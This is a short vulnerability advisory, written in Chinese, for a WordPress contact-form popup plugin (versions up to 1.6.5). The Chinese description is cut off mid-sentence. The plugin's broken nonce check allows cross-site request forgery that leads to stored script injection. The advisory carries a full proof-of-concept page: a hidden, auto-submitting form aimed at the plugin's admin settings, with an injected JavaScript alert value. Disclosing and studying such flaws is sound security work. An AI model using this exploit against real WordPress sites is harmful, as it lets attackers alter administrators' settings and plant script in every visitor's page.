Popup for CF7 with Sweet Alert <= 1.6.5 - 跨站请求伪造
https://wordpress.org/plugins/cf7-sweet-alert-popup/
该插件的设置处理程序在其 nonce 验证中存在逻辑错误,导致所有 CSRF 保护失效。 未经身份验证的攻击者可以利用这一点,诱骗已通过身份验证的管理员访问一个包含隐藏自动提交表单的恶意页面,从而任意修改插件设置。 提交的值在存储时未经过清理,并通过 wp_head 被原样注入到每个前端页面的
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>
<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
method="POST" id="csrf" target="hiddenframe">
<input name="cf7simplePopupWidth" value="500;alert(document.domain)">
<input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>